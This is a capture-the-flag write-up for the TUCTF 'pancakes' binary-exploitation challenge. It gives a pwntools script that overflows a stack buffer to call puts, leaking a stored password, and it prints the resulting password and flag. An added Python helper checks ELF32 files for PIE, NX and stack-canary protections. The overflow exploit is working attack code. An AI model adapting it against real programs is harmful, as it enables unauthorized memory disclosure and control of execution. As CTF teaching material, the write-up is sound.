pancakes [pwn]

pancakes

You ever just get a craving for pancakes?

nc chal.tuctf.com 30503

Recon

Again another ELF binary which asks for a password. The password is loaded from a file password.txt and if correct it will display the contents of flag.txt. The idea was to build a ROP chain that opens flag.txt and puts the contents to stdout, but I noticed the contents of password.txt were on the stack, so I just chose to display that and then use it to get the flag manually.

Code

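from pwn import *

# Local process for testing; the remote connection below replaces it.
s = process("./pancakes")
s = remote("chal.tuctf.com", 30503)

pwdata = 0x804c060  # address of the loaded password data
aputs = 0x8049060   # address of puts in the binary

print(s.recvuntil(b"> ").decode())

buf  = b"A"*44       # padding up to the saved return address
buf += p32(aputs)    # overwrite the return address with puts
buf += b"DDDD"       # dummy return address for the puts call
buf += p32(pwdata)   # argument to puts: pointer to the password

s.send(buf)
print(s.recvall(timeout=2).decode(errors="replace"))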

Flag

$ ./pancake.py 
[+] Starting local process './pancakes': pid 28676
[+] Opening connection to chal.tuctf.com on port 30503: Done
Enter pancake password
> 
[+] Receiving all data: Done (38B)
[*] Closed connection to chal.tuctf.com port 30503
Try harder
l0r3m_1p5um_d0l0r_517_4m37

$ nc chal.tuctf.com 30503
Enter pancake password
> l0r3m_1p5um_d0l0r_517_4m37
TUCTF{p4nc4k35_4r3_4b50lu73ly_d3l1c10u5_4nd_y0u_5h0uld_637_50m3_4f73r_7h15}

Running it gives us the password l0r3m_1p5um_d0l0r_517_4m37 and with that we got the flag TUCTF{p4nc4k35_4r3_4b50lu73ly_d3l1c10u5_4nd_y0u_5h0uld_637_50m3_4f73r_7h15}.
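
The script hard-codes two addresses (0x8049060 and 0x804c060) and overwrites the saved return address with a plain 44-byte pad, which is consistent with a binary built without PIE and without a stack protector. The check below is an added example, not part of the original writeup: it reads an ELF32 header and reports those build properties. The names elf32_mitigations and build_sample and the sample images are constructed for illustration, and the canary test is only a string-presence heuristic.

```python
import struct

ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PF_X = 0x6474E551, 0x1

def elf32_mitigations(data: bytes) -> dict:
    """Report PIE / NX / canary hints for a little-endian ELF32 image."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("not a little-endian ELF32 file")
    # Elf32_Ehdr fields that follow the 16-byte e_ident array.
    (e_type, _mach, _ver, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from("<HHIIIIIHHH", data, 16)
    nx = False  # no PT_GNU_STACK header at all: treat the stack as executable
    for i in range(e_phnum):
        p_type, _off, _va, _pa, _fsz, _msz, p_flags, _align = struct.unpack_from(
            "<8I", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {
        "pie": e_type == ET_DYN,   # ET_EXEC loads at fixed addresses
        "nx": nx,
        "canary": b"__stack_chk_fail" in data,  # heuristic: symbol name present
    }

def build_sample(e_type: int, stack_flags: int, extra: bytes = b"") -> bytes:
    """Constructed image: ELF32 header plus one PT_GNU_STACK program header."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0x8049000,
                       52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ident + ehdr + phdr + extra

if __name__ == "__main__":
    # Constructed samples: a fixed-address build and a hardened build.
    print(elf32_mitigations(build_sample(ET_EXEC, 0x6)))
    print(elf32_mitigations(build_sample(ET_DYN, 0x6, b"\0__stack_chk_fail\0")))
```

To check a real file, pass its bytes: elf32_mitigations(open(path, "rb").read()).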